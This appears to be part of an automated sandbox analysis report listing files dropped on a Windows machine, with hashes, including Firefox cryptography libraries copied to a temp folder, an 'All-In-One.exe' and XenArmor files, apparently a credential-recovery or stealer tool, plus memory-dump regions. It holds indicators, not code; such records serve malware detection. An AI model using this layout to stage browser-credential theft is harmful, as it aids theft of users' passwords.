SHA512 65f8397de5c48d3df8ad79baf46c1d3a0761f727e918ae63612ea37d96adf16cc76d70d454a599f37f9ba9b4e2e38ebc845df4c74fc1e1131720fd0dcb881431

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-runtime-l1-1-0.dll

MD5 41a348f9bedc8681fb30fa78e45edb24
SHA1 66e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256 c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SHA512 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-stdio-l1-1-0.dll

MD5 fefb98394cb9ef4368da798deab00e21
SHA1 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256 b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SHA512 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-string-l1-1-0.dll

MD5 404604cd100a1e60dfdaf6ecf5ba14c0
SHA1 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SHA512 da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-time-l1-1-0.dll

MD5 849f2c3ebf1fcba33d16153692d5810f
SHA1 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SHA512 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-utility-l1-1-0.dll

MD5 b52a0ca52c9c207874639b62b6082242
SHA1 6fb845d6a82102ff74bd35f42a2844d8c450413b
SHA256 a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0
SHA512 18834d89376d703bd461edf7738eb723ad8d54cb92acc9b6f10cbb55d63db22c2a0f2f3067fe2cc6feb775db397030606608ff791a46bf048016a1333028d0a4

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\freebl3.dll

MD5 04a2ba08eb17206b7426cb941f39250b
SHA1 731ac2b533724d9f540759d84b3e36910278edba
SHA256 8e5110ce03826f680f30013985be49ebd8fc672de113fc1d9a566eced149b8c4
SHA512 e6e90b4becf472b2e8f716dbb962cd7de61676fcce342c735fccdc01268b5a221139bc9be0e0c9722e9978aefaae79c10bc49c43392aa05dd12244b3147aeffc

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\mozglue.dll

MD5 591533ca4655646981f759d95f75ae3d
SHA1 b4a02f18e505a1273f7090a9d246bc953a2cb792
SHA256 4434f4223d24fb6e2f5840dd6c1eedef2875e11abe24e4b0e9bc1507f8f6fd47
SHA512 915b124ad595ee78feab8f3c9be7e80155445e58ed4c88b89665df5fb7e0a04e973374a01f97bb67aaa733a8ce2e91a9f92605ec96251906e0fb2750a719b579

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\nss3.dll

MD5 fc57d044bfd635997415c5f655b5fffa
SHA1 1b5162443d985648ef64e4aab42089ad4c25f856
SHA256 17f8c55eba797bbc80c8c32ca1a3a7588415984386be56f4b4cdefd4176fb4c3
SHA512 f5a944230000730bc0aad10e6607e3389d9d82a0a4ab1b72a19d32e94e8572789d46fb4acd75ad48f17e2bbc27389d432086696f2ccc899850ff9177d6823efb

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\softokn3.dll

MD5 1b304dad157edc24e397629c0b688a3e
SHA1 ae151af384675125dfbdc96147094cff7179b7da
SHA256 8f0c9ac7134773d11d402e49daa90958fe00205e83a7389f7a58da03892d20cb
SHA512 2dc625dbdf2aae4ade600cca688eb5280200e8d7c2dfc359590435afe0926b3a7446cc56a66023ee834366132a68ae68da51a5079e4f107201e2050f5c5512ad

C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

C:\Users\Admin\AppData\Local\Temp\All-In-One.exe

MD5 a48e3197ab0f64c4684f0828f742165c
SHA1 f935c3d6f9601c795f2211e34b3778fad14442b4
SHA256 baecc747370a4c396ef5403a3a2b286465d8fe4677bf1bfd23b8164ef5c22bbb
SHA512 e0b0b73c39850a30aac89f84f721c79f863612f596d6ff3df0860a9faf743a81364656773c99708e9c0656c74b6a278b6bf7e648f7ff1b9080f9a21e10515a59

C:\Users\Admin\AppData\Local\Temp\settings.db

MD5 56b941f65d270f2bf397be196fcf4406
SHA1 244f2e964da92f7ef7f809e5ce0b3191aeab084a
SHA256 00c020ba1cce022364976f164c575993cb3b811c61b5b4e05a8a0c3d1b560c0c
SHA512 52ad8c7ed497a5b8eed565b3abcbf544841f3c8c9ec3ca8f686846a2afd15ac4ac8b16abf1cb14aeca1a2fb31f3086ad17206ec4af28e77bae600dca15e8deab

C:\Users\Admin\AppData\Local\Temp\License.XenArmor

MD5 774a9a7b72f7ed97905076523bdfe603
SHA1 946355308d2224694e0957f4ebf6cdba58327370
SHA256 76e56835b1ac5d7a8409b7333826a2353401cf67f3bd95c733adc6aa8d9fec81
SHA512 c5c77c6827c72901494b3a368593cb9a990451664b082761294a845c0cd9441d37e5e9ac0e82155cb4d97f29507ffc8e26d6ff74009666c3075578aa18b28675

C:\Users\Admin\AppData\Local\Temp\XenManager.dll

MD5 7a5c53a889c4bf3f773f90b85af5449e
SHA1 25b2928c310b3068b629e9dca38c7f10f6adc5b6
SHA256 baa9c3a0d0524263c4f848056b3f1da3b4bb913162362cbcabe77ce76a39870c
SHA512 f5943687d7e098790581bf56ac6fec3b7e9b83d0e29301077a8bc48768c5a0e9f54f53d926f9847885f6035a2b31e456e4e45ccf1c70be27229c46e79876e2ed

memory/4612-244-0x0000020FF4A90000-0x0000020FF4AA6000-memory.dmp

memory/1188-256-0x0000000000550000-0x0000000000560000-memory.dmp

memory/1188-263-0x0000000004DE0000-0x0000000004E72000-memory.dmp

memory/1188-264-0x0000000004E80000-0x0000000004F1C000-memory.dmp

memory/1188-265-0x00000000054D0000-0x0000000005A74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OutPut.json

MD5 f6ce70d5466fe074a3b419543ff95d8b
SHA1 915d6dc9ca2686d63979e77adc43d71c9678e534
SHA256 6a509971a9cc11490946cb7b33864da43cd3af9f25673c130fc3bab5c365ff29
SHA512 93e83de5d0a96cd71dcfb8f9ab3b32ed2afaa388a77ac450dd7fdca11dcf2ff0d59db54107c936859d6df3b6d28630b2e9907e0b546e8b27336b684bcbed84f8

memory/1188-294-0x0000000005120000-0x0000000005186000-memory.dmp

memory/3372-295-0x0000000002E70000-0x0000000002EA6000-memory.dmp

memory/3372-296-0x0000000005530000-0x0000000005B58000-memory.dmp

memory/3372-297-0x00000000054B0000-0x00000000054D2000-memory.dmp

memory/3372-298-0x0000000005CD0000-0x0000000005D36000-memory.dmp

memory/3372-308-0x0000000005FA0000-0x00000000062F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a0cb52ecad11458881d7edfc499c4053
SHA1 eda74aa1fa1b46fdbf5befc3d9843e98eb06b02b
SHA256 c96df62683d2b79ca4b1a97bcc247de6822a7bd8eb3f7de533caf198509a6f5b
SHA512 8a9c2126701b9324e5bb770b13673ba412445dc095a2c016234198d95111c28b96d2bef0172b43c34215824922d4ed5aa8707f8dc6f0535c1be5b0f506063467

memory/3372-310-0x0000000006450000-0x000000000646E000-memory.dmp

memory/3372-311-0x0000000006490000-0x00000000064DC000-memory.dmp